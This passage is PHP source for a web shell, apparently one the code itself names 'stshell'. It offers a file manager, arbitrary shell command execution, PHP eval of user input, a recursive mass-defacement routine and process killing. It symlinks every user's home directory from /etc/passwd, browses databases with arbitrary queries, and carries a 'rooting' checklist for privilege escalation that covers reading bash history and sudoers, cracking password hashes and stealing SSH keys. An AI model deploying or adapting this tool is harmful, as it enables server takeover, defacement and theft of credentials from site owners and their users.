if (is_dir($arg)) {
$handle = opendir($arg);
while($aux = readdir($handle)) {
if(!is_dir($aux))
$dir[]=array("fname"=>$aux ,"fsize"=> (get_size($aux)),"perms"=>show_perms(fileperms($aux)), "mdate"=>date('d-M-Y h:i:s', filemtime($aux)));
else
$dir[]=array("fname"=>"[ {$aux} ]","fsize"=> "Dir","perms"=>show_perms(fileperms($aux)), "mdate"=>date('d-M-Y h:i:s', filemtime($aux)));
//}
}
@closedir($handle);
}
else
$total = filesize($arg);
}
asort($dir);
return $dir;
}
function displayDirList( $dir)
{
global $rpath, $islinux;
echo "<div class='bodyDiv' >
<form method='post' name='fmform' id='fmform1'>";
echo "<table><tr><th> </th><th>Filename</th><th>Size</th>";
if($islinux)
{
echo "<th>Owner:Group</th>";
}
echo "<th>Perms</th><th>Modified</th><th>Action</th></tr>";
foreach ($dir as $d)
{
if($d['fname'][0]==='[')
{
$tname = str_replace("[ ","",$d['fname']);
$tname = str_replace(" ]","",$tname);
echo "\n<tr>";
echo "<td class=\"center\"><input type=\"checkbox\"
name='fileItem[]' value='{$tname}'></td>";
echo "<td><a href='{$rpath}?cd={$tname}'>{$d["fname"]}</a></td>";
echo "<td class=\"center\">".$d["fsize"] . "</td>";
if($islinux)
{
$o = posix_getpwuid(fileowner($tname));
$g = posix_getgrgid(filegroup($tname));
echo "<td class=\"center\">". $o['name'] .
":" . $g['name'].
"</td>";
}
echo "<td class=\"center\">".$d["perms"] . "</td>";
echo "<td class=\"center\">".$d["mdate"] . "</td>";
echo "<td class=\"center\">";
echo "<a href=\"javascript:;\"
onclick=\"displayPopupNewName('NewName','".$tname."')\">Rename</a>";
echo "<a href=\"{$rpath}?delf={$tname}\">Delete</a><a href=\"{$rpath}?dl={$tname}&dlf=1\">Download</a></td>";
echo "</tr>";
}
}
foreach ($dir as $d)
{
if($d['fname'][0]!=='[')
{
echo "\n<tr>";
echo "<td class=\"center\"><input type=\"checkbox\"
name='fileItem[]' value='{$d['fname']}'></td>";
//if(is_dir($d['fname']))
//{
//echo "<td><a href='#'>{$d["fname"]}</a></td>";
//}
//else {
//echo "<td><a href='#'>{$d["fname"]}</a></td>";
// }
echo "<td><a href='{$rpath}?dl={$d['fname']}'>{$d["fname"]}</a></td>";
echo "<td class=\"center\">".$d["fsize"] . "</td>";
if($islinux)
{
//echo "<td class=\"center\">";//. posix_getpwuid(fileowner($d['fname']))['name'] .
//":" . posix_getgrgid(filegroup($d['fname']))['name'].
// echo "</td>";
$o = posix_getpwuid(fileowner($d['fname']));
$g = posix_getgrgid(filegroup($d['fname']));
echo "<td class=\"center\">". $o['name'] .
":" . $g['name'].
"</td>";
}
echo "<td class=\"center\">".$d["perms"] . "</td>";
echo "<td class=\"center\">".$d["mdate"] . "</td>";
echo "<td class=\"center\"><a href=\"{$rpath}?vf={$d['fname']}\">View</a>";
echo "<a href=\"javascript:;\"
onclick=\"displayPopupNewName('NewName','".$d['fname']."')\">Rename</a>";
echo "<a href=\"{$rpath}?delf={$d['fname']}\">Delete</a><a href=\"{$rpath}?dl={$d['fname']}\">Download</a> </td>";
echo "</tr>";
}
}
echo "</table><br>";
echo "Actions: ";
echo "<input type='submit' name='dff' value='NewFolder'
onclick='displayNewFolder();return false;'>";
echo "<input type='submit' name='dff' value='NewFile'
onclick=\"displayNewFile('NewFile');return false;\">";
// onclick=\"displayNewFile('NewFile');return false;\">";
echo "<input type='submit' name='dff' value='Copy' > ";
echo "<input type='submit' name='dff' value='Cut'>";
echo "<input type='submit' name='dff' value='Paste'>";
echo "<input type='submit' name='dff' value='Delete'>";
echo "<input type='submit' name='dff' value='Zip'>";
echo "<input type='submit' name='dff' value='Zip Download'>";
echo "</form></div>";
}
function displayUpload()
{
global $rpath;
?>
<div id='upload'>
<form action="<?php echo $rpath?>?upl=1" method="POST" enctype="multipart/form-data">
<div id="fileContainer">
<div class="selectFile">
Select File!
<input type="file" onchange="fileSelected();" name="uploadFile[]">
</div>
</div>
<input type="submit" value="upload">
</form></div>
<?php
}
function displayCMD()
{
if(isset($_SESSION['current_dir']))
chdir($_SESSION['current_dir']);
echo "<div id='textAreaDiv'><textarea name=\"test\" id=\"tarea\" rows=\"15\" readonly>".getcwd()."\n</textarea></div>";
?>
<div id='cmdDiv'><form method="post" onsubmit="return false;">
<label onmouseover="selectCMD();" >cmd: <input type="text" size=40% name="cmd" autocomplete="off" id="cmd" onmouseover="this.select();"></label>
<input type="submit" name="Execute" value="Execute" onclick="executeCMD();">
<input type="submit" name="Clear" value="Clear History" onclick="clearHistory();">
</form></div>
<?php
}
function displayMassDeface()
{
global $rpath;
?>
<form method="post" action="<?php echo $rpath?>?md=1">
<div id='textAreaDiv'><textarea name="defacePage" id="tarea" rows="15" >Deface Page Here!</textarea></div>
<div class='bodyDiv'>
<label >
Filename: <input type="text" size=30% name="defaceFilename" autocomplete="off" onmouseover="this.select();"/>
</label>
<label >
Path: <input type="text" value="<?= $_SESSION['current_dir']?>" size=30% name="defacePath" autocomplete="off" onmouseover="this.select();"/>
</label>
<input type="submit" name="Execute" value="Deface" onclick="executeCMD();">
</div></form>
<?php
}
function saveFile()
{
$fileCount = count($_FILES['uploadFile']['name']);
for($i=0;$i<$fileCount-1;$i++)
{
$fname= $_FILES['uploadFile']['name'][$i];
$tname= $_FILES['uploadFile']['tmp_name'][$i];
$cdir = $_SESSION['current_dir'];
save_upload($tname, $fname,$cdir );
}
}
function getAvailableFilename($path,$filename)
{
//chdir($path);
$i=0;
while(true)
{
if(file_exists($filename.".bkp." . $i))
{
$i++;
}
else
return $filename.".bkp." . $i;
}
}
function massDeface($defacePath)
{
global $defacePage, $defaceFilename;
global $rnd;
chdir($defacePath);
if(file_exists($defaceFilename))
{
rename($defaceFilename,getAvailableFilename($defacePath, $defaceFilename));
}
$myfile = fopen($defaceFilename, "w") or die("Unable to open file!");
fwrite($myfile, $defacePage);
fclose($myfile);
$handle = opendir($defacePath);
while($aux = readdir($handle)) {
//if ($aux != "." && $aux != "..")
//{
//$total += total_size($arg."/".$aux);
if(is_dir($aux) && $aux != "." && $aux != "..")
{
massDeface(getcwd()."\\" . $aux);
chdir($defacePath);
}
//}
}
@closedir($handle);
}
function displayProcess()
{
global $islinux;
//echo "<div class=\"bodyDiv\">";
if(!$islinux)
{
echo "<form method='post'><table><tr><th> </th><th>Process</th><th>PID</th><th>Sess Name</th><th>Sess#</th><th>Mem Usage</th></tr>";
exec("tasklist 2>NUL", $task_list);
for ($i=3;$i<count($task_list);$i++){
$task_line = $task_list[$i];
//explode(" ",);
list($pname,$pid,$sname,$snumber,$memusage,$unit)=preg_split("/[ ]+/",$task_line);
echo "<tr>";
echo "<td class=\"center\"><input type=\"checkbox\"
name='killPid[]' value={$pid}></td>";
echo "<td class=\"center\">{$pname}</td>";
echo "<td class=\"center\">{$pid}</td>";
echo "<td class=\"center\">{$sname}</td>";
echo "<td class=\"center\">{$snumber}</td>";
echo "<td class=\"center\">{$memusage} {$unit}</td>";
echo "</tr>";
// echo $task_line . "<br/>";
}
echo "</table><br><input type='submit' name='killPids' value='Kill'></form>";
}
else
{
echo "<form method='post'><table id='processes'> <tr><th> </th><th>USER</th><th>PID</th><th>%CPU</th>
<th>%MEM</th><th>VSZ</th><th>RSS</th><th>TTY</th><th>STAT</th><th>START</th><th>TIME</th><th style='text-align:left'>COMMAND</th></tr>";
exec("ps aux ", $task_list);
for ($i=3;$i<count($task_list);$i++){
$task_line = $task_list[$i];
//explode(" ",);
list($user,$pid,$cpu,$mem,$vsz,$rss,$tty,$stat,$start,$time,$command)=preg_split("/[ ]+/",$task_line);
preg_match("/(^.*?[ ]+.*?[ ]+.*?[ ]+.*?[ ]+.*?[ ]+.*?[ ]+.*?[ ]+.*?[ ]+.*?[ ]+.*?[ ]+.*?)(.*)/", $task_line, $matches);
$command1 = $matches[2];
echo "<tr>";
echo "<td class=\"center\"><input type=\"checkbox\"
name='killPid[]' value={$pid}></td>";
echo "<td class=\"center\">{$user}</td>";
echo "<td class=\"center\">{$pid}</td>";
echo "<td class=\"center\">{$cpu}</td>";
echo "<td class=\"center\">{$mem}</td>";
echo "<td class=\"center\">{$vsz}</td>";
echo "<td class=\"center\">{$rss}</td>";
echo "<td class=\"center\">{$tty}</td>";
echo "<td class=\"center\">{$stat}</td>";
echo "<td class=\"center\">{$start}</td>";
echo "<td class=\"center\">{$time}</td>";
echo "<td >{$command1}</td>";
echo "</tr>";
}
echo "</table><br><input type='submit' name='killPids' value='Kill'></form>";
}
//echo "</div>";
}
function killProcesses($pids)
{
global $islinux;
foreach ($pids as $pid)
{
if(!$islinux)
{
exec("taskkill /F /PID $pid");
}
else
{
exec("kill -9 {$pid}");
}
}
}
function displayFind()
{
chdir($_SESSION['current_dir']);
?>
<div class='bodydiv'>
<form method='post'>
<table id='find'>
<tr>
<td>Search in:</td><td> <input name='searchIn' value="<?php echo getcwd();?>">
</td></tr>
<tr>
<td>Dirname contains:</td><td> <input name='dirnamecontain'>
</td></tr>
<tr>
<td>Filename contains: </td><td><input name='filenamecontain'>
</td></tr>
<tr>
<td>File Contain: </td><td><input name='filecontain'>
</td></tr>
<tr>
<td>Permissions: </td><td><input type="checkbox" name='readable'> Readable
<input type="checkbox" name='writable'> Writable
<input type="checkbox" name='executable'> Executable
</td></tr>
<tr>
<td><input type='submit' name='Find' value='Find'>
</td><td></td></tr>
</table>
</form>
</div>
<?php
}
function processFind()
{
global $searchIn,$dirnamecontain,$filenamecontain,
$readable,$writable,$executable;
echo "<div class='bodyDiv'>";
findNameContain($searchIn,$dirnamecontain,$filenamecontain);
echo "</div>";
}
function findNameContain($searchIn, $dirnamecontain,$filenamecontain)
{
global $rpath,$filecontain,$readable,$writable,$executable;
chdir($searchIn);
// Create recursive directory iterator
/** @var SplFileInfo[] $files */
$files = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator( $searchIn),
RecursiveIteratorIterator::LEAVES_ONLY
);
foreach ($files as $name => $file)
{
// Skip directories (they would be added automatically)
$filePath = $file->getRealPath();
if (!$file->isDir() and $filenamecontain!==""
and strpos($name,$filenamecontain)!==false)
{
// Get real and relative path for current file
echo "<a href='{$rpath}?dl={$filePath}&dlfile=1'>".$filePath . "</a><br>";
}
if (!$file->isDir() and $filecontain!=="")
{
// Get real and relative path for current file
if(findFileContent($filePath,$filecontain))
{
echo "<a href='{$rpath}?dl={$filePath}&dlfile=1'>".$filePath . "</a><br>";
}
}
else if($file->isDir() and strpos($file,'..')===false
and $dirnamecontain!=="" and
strpos($name,$dirnamecontain)!==false)
{
echo "<a href='{$rpath}?cd={$filePath}&cdf=1'>".$filePath. "</a><br>";
}
$p1 = fileperms($filePath);
$perms = show_perms($p1);
if ( ( isset($readable) and strpos($perms,'r')!=false) or
(isset($writable) and strpos($perms,'w') !=false) or
(isset($executable) and strpos($perms,'x')!=false) )
{
// Get real and relative path for current file
if(!$file->isDir() and strpos($file,'..')===false)
{
echo "<a href='{$rpath}?dl={$filePath}&dlfile=1'>".$filePath . "</a><br>";
}
else if(strpos($file,'..')===false)
{
echo "<a href='{$rpath}?cd={$filePath}&cdf=1'>".$filePath. "</a><br>";
}
}
}
}
function findFileContent($file,$pattern)
{
$data = file_get_contents($file);
//if(strpos($data))
//var_dump($data);
if(strpos($data,$pattern)!==false)
{
return true;
}
return false;
}
function phpEval()
{
global $ev;
//eval(stripslashes($ev));
eval($ev);
}
function displayEval()
{
global $rpath;
?>
<form method="post" onsubmit="return false;">
<div id='textAreaDiv'>
<textarea name="code" id="tarea" rows="15" >echo "Welcome!";</textarea>
</div>
<input type="submit" style="margin-left: 10px" name="Execute" value="Execute" onclick="executeEval();">
</form>
<div class='bodyDiv' id='evalBody'>
Welcome!
</div>
<?php
}
function displayRooting()
{
global $rpath;
?>
<div class='bodyDiv' >
1 - Search rooting exploit to escalate privileges.<br>
2 - Symlink webserver.<br>
3 - Find database connection files using: find ./ -name *.php -print0 | xargs -0 grep -i -n "mysql_connect"
4 - Find database user with admin privileges.<br>
5 - Search for username and password in webserver logs<br>
6 - Search Bash history for passwords, e.g. cat /home/UserName/.bash_history , cat /root/.bash_history
<br>
7 - Find apache .htpasswd and Crack passwords with Hashcat.<br>
8 - Read emails on Server. <br>
9 - Exploit cat /etc/crontab <br>
10 - Get files edited with vi editor by appending ~ to file name <br>
11- Crack all passwords for web application users, one of them will have sudo su priviliges.<br>
12- cat /etc/sudoers<br>
13- Trash files# cat /home/UserName/.local/share/Trash/files/Payroll<br>
14- Steal ssh private keys <br>
<br/><br/><br/><br/><br/><br/>
</div>
<?php
}
function displaySymlink()
{
global $rpath, $islinux;
if($islinux)
{
$lines = file("/etc/passwd");
chdir($_SESSION['current_dir']);
mkdir("stshell");
chdir("stshell");
$tmp=getcwd();
echo "<div class='bodyDiv' >";
echo "<table>";
foreach($lines as $line)
{
list($user,,,,,$home,)=explode(":",$line);
echo "<tr><td>".$user."</td><td>
<a href='{$rpath}?cds={$tmp}/{$user}' onclick='return !window.open(this.href);'>".$home."</a></td></tr>";
exec("ln -s ".$home . " ". $user,$output);
}
echo "</div>";
}
else
{
echo "<div class='bodyDiv' >Is this linux machine???</div>";
}
}
function displayDatabase()
{
global $rpath,$v,$connect,$disconnect,$query,$rem;
if(isset($connect))
{
list($u,$h)=explode("@",$connect);
selectDatabase($u, $h);
//$v='cn';
}
if(isset($rem))
{
list($u,$h)=explode("@",$rem);
removeDatabase($u, $h);
$v='cn';
}
if(isset($disconnect))
{
//list($u,$h)=explode("@",$connect);
//selectDatabase($u, $h);
unset($_SESSION['selected']);
}
?>
<div class="bodyDiv">
<a href='?v=cn'>Connections </a>
<a href='?v=db'>Databases</a>
<a href='?v=qd'>Query</a>
</div>
<?php
if(isset($v) and $v=='cn')
{
?>
<div id='dbContainer0' >
<div class="bodyDiv">
<form onsubmit="return false;">
<table id="db" >
<tr><td id="db">Username:</td><td id="db"> <input type="Text" name="dbusername" id="dbusername"></td></tr>
<tr><td id="db">Password: </td><td id="db"><input type="Text" name="dbpassword" id="dbpassword"></td></tr>
<tr><td id="db">Database:</td><td id="db"><input type="Text" name="dbname" id="dbname"></td></tr>
<tr><td id="db">Host: </td><td id="db"><input type="Text" name="dbhost" id="dbhost"></td></tr>
<tr><td id="db"> </td><td id="db"><input type="submit" onclick="saveDB()" value="Save" name="submit"></td></tr>
</table>
</form>
</div>
<div class="bodyDiv" id='dbConnectionsList'>
<?= displayDatabaseCredentials();?>
</div>
<div class='bodyDiv' id='databasesListDiv' style='display: none'>
databases<br>
</div>
<div class='bodyDiv' id='tablesListDiv' style='display: none'>
tables
</div>
<div class='bodyDiv1' id='tableDataDiv' style='display: none'>
table Data
</div>
</div>
<?php
}
else if($v=='db')
{
echo "<div class='bodyDiv'>";
if(isset($_SESSION['selected']))
{
listDatabases();
}
else
displayDatabaseCredentials();
echo "</div>";
}
else if($v=='tb')
{
echo "<div class='bodyDiv'>";
if(isset($_SESSION['selected']))
{
listDatabases();
}
echo "</div>";
echo "<div class='bodyDiv'>";
list($u,$h,$db)=explode("@",$connect);
listTables($u,$h,$db);
$_SESSION['selectddb']=$connect;
echo "</div>";
}
else if($v=='tbld')
{
echo "<div class='bodyDiv'>";
if(isset($_SESSION['selected']))
{
listDatabases();
}
echo "</div>";
echo "<div class='bodyDiv'>";
list($u,$h,$db)=explode("@",$connect);
listTables($u,$h,$db);
echo "</div>";
echo "<div class='bodyDiv'>";
list($u,$h,$db,$tbl)=explode("@",$connect);
displayTableData($u,$h,$db,$tbl);
$_SESSION['selectedtbl']=$connect;
echo "</div>";
}
else if($v=='qd')
{
$db="db";
$tbl="tbl";
if(isset($_SESSION['selectedtbl']))
list($u,$h,$db,$tbl)=explode("@",$_SESSION['selectedtbl']);
?>
<div class='bodyDiv'>
<form method="post">
<textarea rows=4 name='query'>select * from <?php echo "{$db}.{$tbl}"?>;</textarea>
<input type='submit' value=Execute>
</form>
</div>
<?php
if(isset($query))
{
executeQuery($query);
}
}
}
function executeQuery($query)
{
//list($u,$h,$db,$tbl)=$_SESSION['selectddb'];
if(isset($_SESSION['selected']))
list($u,$h)=explode("@",$_SESSION['selected']);
foreach ($_SESSION['dbconnections'] as $con)
{
if($con['dbusername']===$u and $con['dbhost']===$h){
try
{
$db = new PDO("mysql:host={$con['dbhost']};dbname={$con['dbname']};charset=utf8",$con['dbusername'],$con['dbpassword']);
/*Other Codes*/
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
if(!(preg_match("/^select.*/i",$query)===1))
{
echo "<div class='bodyDiv'>Modified Rows: " . $db->exec($query) ."</div>";
break;
}
$rows = $db->query($query);
if($rows)
{
$count=$rows->rowCount();
}
else
$count=0;
echo "<div class='bodyDiv'><table>";
if($count>0)
{
$count--;
$row=$rows->fetch();
echo "<tr>";
$i=1;
foreach ($row as $k=>$v)
{
if($i%2===1)
echo "<th>".$k . "</th>";
$i++;
}
echo "</tr>";
echo "<tr>";
$i=1;
foreach ($row as $k=>$v)
{
if($i%2===1)
echo "<td class='center'>".$v . "</td>";
$i++;
}
echo "</tr>";
}
while($count>0)
{
$row=$rows->fetch();
echo "<tr>";
$i=1;
foreach ($row as $k=>$v)
{
if($i%2===1)
echo "<td class='center'>".$v . "</td>";
$i++;
}
echo "</tr>";
$count--;
}
echo "</div></table>";
}
catch(PDOException $abc )
{
echo "Error: ".$abc->getMessage();
}
}
break;
}
}
function displayDatabaseCredentials()
{
global $rpath;
$output="";
if(!isset($_SESSION['dbconnections']))
return $output;
echo "<table id='db'>";
$u="";
$h="";
if(isset($_SESSION['selected']))
list($u,$h)=explode("@",$_SESSION['selected']);
foreach ($_SESSION['dbconnections'] as $con)
{
if($con['dbusername']===$u and $con['dbhost']===$h){
echo "<tr><td>{$con['dbusername']} @ {$con['dbhost']}</td><td>
<a href='?v=cn&disconnect={$con['dbusername']}@{$con['dbhost']}'>Disconnect</a>
<a href='?rem={$con['dbusername']}@{$con['dbhost']}'>Remove</a></td></tr>";
}
else
echo "<tr><td>{$con['dbusername']} @ {$con['dbhost']}</td><td>
<a href='?v=cn&connect={$con['dbusername']}@{$con['dbhost']}'>Connect</a><a href=''>Remove</a></td></tr>";
//$output.= "<a href='{$rpath}?listDB=1&{$con['dbusername']}&{$con['dbhost']}'> {$con['dbusername']} @ {$con['dbhost']} </a><br>";
//$output.= "<a href=\"javascript:alert('{$con['dbusername']}@{$con['dbhost']}');\" onlick='alert(1);'> {$con['dbusername']} @ {$con['dbhost']} </a><br>";
//$output.= "<a href='javascript:;' onclick=\"connectDatabase('{$con['dbusername']}@{$con['dbhost']}');\"> {$con['dbusername']} @ {$con['dbhost']} </a><br>";
//javascript:
}
return $output;
}
function saveDatabaseCredentials()
{
global $dbusername, $dbpassword, $dbname, $dbhost;
if(!isset($_SESSION['dbconnections']))
$_SESSION['dbconnections']= array();
$dbhost=(isset($dbhost) and $dbhost!=="")?$dbhost:"localhost";
$_SESSION['dbconnections'][]=array('dbusername'=>$dbusername,'dbpassword'=>$dbpassword,
'dbname'=>$dbname,'dbhost'=>$dbhost);
echo displayDatabaseCredentials();
}
function connectSelectedDb()
{
global $con;
global $mysqlHandle;
list($u,$h)=explode("@",$_SESSION['selected']);
foreach ($_SESSION['dbconnections'] as $con1)
{
if($con1['dbusername']===$u and $con1['dbhost']===$h)
{
$con=$con1;
$mysqlHandle = @mysql_connect( $h.":3306", $u, $con['dbpassword'] );
break;
}
}
}
function selectDatabase($u,$h){
$_SESSION['selected']=$u."@".$h;
}
function removeDatabase($u,$h){
for($i=0;count($_SESSION['dbconnections']);$i++)
{
if($_SESSION['dbconnections'][$i]['dbusername']===$u and
$_SESSION['dbconnections'][$i]['dbhost']===$h)
{
unset($_SESSION['dbconnections'][$i]);
unset($_SESSION['selected']);
$_SESSION['dbconnections']=array_values($_SESSION['dbconnections']);
break;
}
}
}
function listDatabases()
{
global $mysqlHandle, $PHP_SELF, $con;
connectSelectedDb();
$pDB = mysql_list_dbs( $mysqlHandle );
$num = mysql_num_rows( $pDB );
//$output = "[ {$u} @ {$h} ]<br>";
$output="";
for( $i = 0; $i < $num; $i++ ) {
$dbname = mysql_dbname( $pDB, $i );
//$output.= $dbname . "<br/>";
$output.= "<a href='?v=tb&connect={$con['dbusername']}@{$con['dbhost']}@${dbname}'> {$dbname}</a><br>";
}
echo $output;
// return $output;
//return "this is list of databases ".$u."@" . $h;
}
function listTables($u,$h,$dbname) {
global $mysqlHandle, $PHP_SELF,$con;
connectSelectedDb();
$pTable = mysql_list_tables( $dbname );
if( $pTable == 0 ) {
$msg = mysql_error();
echo "<h3>Error : $msg</h3><p>\n";
return;
}
$num = mysql_num_rows( $pTable );
$output="[ {$dbname} ]<br>";
for( $i = 0; $i < $num; $i++ ) {
$tablename = mysql_tablename( $pTable, $i );
//echo $tablename."<br>";
$output.= "<a href='?v=tbld&connect={$con['dbusername']}@{$con['dbhost']}@${dbname}@{$tablename}'> {$tablename}</a><br>";
}
echo $output;
}
function displayTableData($u,$h,$dbname,$tablename)
{
//global $mysqlHandle, $PHP_SELF,$con;
//echo "this is table data; {$u} {$h} {$dbname} {$tablename}";
global $action, $mysqlHandle, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby;
connectSelectedDb();
if( $tablename != "" )
echo "<p >[ $dbname > $tablename ]</p>\n";
else
echo "<p class=location>$dbname</p>\n";
$queryStr="";
$queryStr = stripslashes( $queryStr );
if( $queryStr == "" ) {
$queryStr = "SELECT * FROM $tablename";
//if( $orderby != "" )
// $queryStr .= " ORDER BY $orderby";
//echo "<a href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n";
//echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
}
$pResult = mysql_db_query( $dbname, $queryStr );
$fieldt = mysql_fetch_field($pResult);
$tablename = $fieldt->table;
$errMsg = mysql_error();
//$GLOBALS[queryStr] = $queryStr;
if( $pResult == false ) {
echoQueryResult();
return;
}
if( $pResult == 1 ) {
$errMsg = "Success";
echoQueryResult();
return;
}
echo "<hr>\n";
$row = mysql_num_rows( $pResult );
$col = mysql_num_fields( $pResult );
if( $row == 0 ) {
echo "No Data Exist!";
return;
}
if( $rowperpage == "" ) $rowperpage = 30;
if( $page == "" ) $page = 0;
else $page--;
mysql_data_seek( $pResult, $page * $rowperpage );
echo "<div><table syle='display:inline;' id='table01' cellspacing=1 cellpadding=2>\n";
echo "<tr>\n";
for( $i = 0; $i < $col; $i++ ) {
$field = mysql_fetch_field( $pResult, $i );
echo "<th>";
if($action == "dmlld0RhdGE=")
echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
else
echo $field->name."\n";
echo "</th>\n";
}
echo "<th colspan=2>Action</th>\n";
echo "</tr>\n";
for( $i = 0; $i < $rowperpage; $i++ ) {
$rowArray = mysql_fetch_row( $pResult );
if( $rowArray == false ) break;
echo "<tr>\n";
$key = "";
for( $j = 0; $j < $col; $j++ ) {
$data = $rowArray[$j];
$field = mysql_fetch_field( $pResult, $j );
if( $field->primary_key == 1 )
$key .= "&" . $field->name . "=" . $data;
if( strlen( $data ) > 30 )
$data = substr( $data, 0, 30 ) . "...";
$data = htmlspecialchars( $data );
echo "<td>\n";
echo "$data\n";
echo "</td>\n";
}
if( $key == "" )
echo "<td colspan=2>no Key</td>\n";
else {
echo "<td><a href='$PHP_SELF?action=editData$key&dbname=$dbname&tablename=$tablename'>Edit</a></td>\n";
echo "<td><a href='$PHP_SELF?action=deleteData$key&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
}
echo "</tr>\n";
}
echo "</table></div>\n";
}
function displayLoginForm()
{
echo "<html>";
includeHead();
echo "<body bgcolor='#bbbbbb'>";
includeBanner();
includeMenuBar();
?>
<div class="bodyDiv">
<form method="post">
<table id="db" >
<tr><td id="db">Username:</td><td id="db"> <input type="Text" name="username" id="dbusername"></td></tr>
<tr><td id="db">Password: </td><td id="db"><input type="Text" name="password" id="dbpassword"></td></tr>
<tr><td id="db"> </td><td id="db"><input type="submit" value="Login" name="submit"></td></tr>
</table>
</form>
</div>
<?php
echo "</body></html>";
}
function isLogged()
{
if(isset($_SESSION['username']) and $_SESSION['username']==='admin' )
return true;
return false;
}
function get_client_ip() {
$ipaddress = '';
if(isset($_SERVER['REMOTE_ADDR']) )
{
$ipaddress = $_SERVER['REMOTE_ADDR'];
}
else if (isset($_SERVER['HTTP_CLIENT_IP']))
$ipaddress = $_SERVER['HTTP_CLIENT_IP'];
else if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
$ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
else if(isset($_SERVER['HTTP_X_FORWARDED']))
$ipaddress = $_SERVER['HTTP_X_FORWARDED'];
else if(isset($_SERVER['HTTP_FORWARDED_FOR']) )
$ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
else if(isset($_SERVER['HTTP_FORWARDED']))
$ipaddress = $_SERVER['HTTP_FORWARDED'];
if (strpos($ipaddress, ',') !== false) {
$ips = explode(',', $ipaddress);
$ipaddress = trim($ips[0]);
}
if ($ipaddress == '::1')
$ipaddress = 'localhost';
return $ipaddress;
}
function getServerURL() {
$url = (isset($_SERVER["HTTPS"]) and $_SERVER["HTTPS"] == "on")?"https://":"http://";
$url .= isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:""; // $_SERVER["HTTP_HOST"] is equivalent
if (isset($_SERVER["SERVER_PORT"]) and $_SERVER["SERVER_PORT"] != "80") $url .= ":".$_SERVER["SERVER_PORT"];
return $url;
}
function getCompleteURL() {
return getServerURL().(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:"");
}
function total_delete($arg) {
if (file_exists($arg)) {
@chmod($arg,0755);
if (is_dir($arg)) {
$handle = opendir($arg);
while($aux = readdir($handle)) {
if ($aux != "." && $aux != "..") total_delete($arg."/".$aux);
}
@closedir($handle);
rmdir($arg);
} else unlink($arg);
}
}
function total_copy($orig,$dest) {
$ok = true;
if (file_exists($orig)) {
if (is_dir($orig)) {
mkdir($dest,0755);
$handle = opendir($orig);
while(($aux = readdir($handle))&&($ok)) {
if ($aux != "." && $aux != "..") $ok = total_copy($orig."/".$aux,$dest."/".$aux);
}
@closedir($handle);
} else $ok = copy((string)$orig,(string)$dest);
}
return $ok;
}
function total_move($orig,$dest) {
// Just why doesn't it has a MOVE alias?!
return rename((string)$orig,(string)$dest);
}
function download(){
global $current_dir,$filename;
$file = $filename;
if(file_exists($file)){
$is_denied = false;
/* foreach($download_ext_filter as $key=>$ext){
if (eregi($ext,$filename)){
$is_denied = true;
break;
}
} */
if (!$is_denied){
$size = filesize($file);
header("Content-Type: application/save");
header("Content-Length: $size");
header("Content-Disposition: attachment; filename=\"$filename\"");
header("Content-Transfer-Encoding: binary");
if ($fh = fopen("$file", "rb")){
fpassthru($fh);
fclose($fh);
} else alert(et('ReadDenied').": ".$file);
} else alert(et('ReadDenied').": ".$file);
} else echo 'FileNotFound';
}
function execute_cmd(){
global $cmd;
//header("Content-type: text/plain");
$output="";
if(isset($_SESSION['current_dir']))
chdir($_SESSION['current_dir']);
if (strlen($cmd)){
echo "\n\n# ".$cmd."\n";
if(strpos($cmd, "cd ")===0)
{
$cmd = str_replace("cd ", "", $cmd);
//echo "present directory: " . getcwd() . "\n" . $cmd . "\n";
chdir($cmd);
$_SESSION['current_dir']=format_path(getcwd());
return getcwd();
}
if(preg_match("/.:/",$cmd)===1)
{
chdir($cmd);
$_SESSION['current_dir']=format_path(getcwd());
return getcwd();
}
if(strpos($cmd, "pwd")===0)
{
return getcwd() . "\n";
}
exec($cmd,$mat,$rtrn);
$_SESSION['current_dir']=format_path(getcwd());
echo $_SESSION['current_dir'];
if (count($mat))
//$output.= trim(implode("\n<br/>",$mat));
{
//echo "inside count";
//$output.= html_encode( implode("\n",$mat));
$output.= implode("\n",$mat);
}
else
$output.= "";
} else
$output.="NoCmd";
return $output;
}
function execute_file(){
global $current_dir,$filename;
header("Content-type: text/plain");
$file = $current_dir.$filename;
if(file_exists($file)){
echo "# ".$file."\n";
exec($file,$mat);
if (count($mat)) echo trim(implode("\n",$mat));
} else alert(et('FileNotFound').": ".$file);
}
function save_upload($temp_file,$filename,$dir_dest) {
global $upload_ext_filter;
$filename = remove_special_chars($filename);
$file = $dir_dest.$filename;
$filesize = filesize($temp_file);
$is_denied = false;
if (!$is_denied){
if (!check_limit($filesize)){
if (file_exists($file)){
if (unlink($file)){
if (copy($temp_file,$file)){
@chmod($file,0755);
$out = 6;
} else $out = 2;
} else $out = 5;
} else {
if (copy($temp_file,$file)){
@chmod($file,0755);
$out = 1;
} else $out = 2;
}
} else $out = 3;
} else $out = 4;
return $out;
}
function zip_extract(){ // extract $cmd_arg="test.zip";
global $cmd_arg,$current_dir,$islinux;
$zip = zip_open($current_dir.$cmd_arg);
//echo $current_dir.$cmd_arg;
if ($zip) {
while ($zip_entry = zip_read($zip)) {
if (zip_entry_filesize($zip_entry)) {
$complete_path = $path.dirname(zip_entry_name($zip_entry));
$complete_name = $path.zip_entry_name($zip_entry);
if(!file_exists($complete_path)) {
$tmp = '';
foreach(explode('/',$complete_path) AS $k) {
$tmp .= $k.'/';
if(!file_exists($tmp)) {
@mkdir($current_dir.$tmp, 0755);
}
}
}
if (zip_entry_open($zip, $zip_entry, "r")) {
if ($fd = fopen($current_dir.$complete_name, 'w')){
fwrite($fd, zip_entry_read($zip_entry, zip_entry_filesize($zip_entry)));
fclose($fd);
} else echo "fopen($current_dir.$complete_name) error<br>";
zip_entry_close($zip_entry);
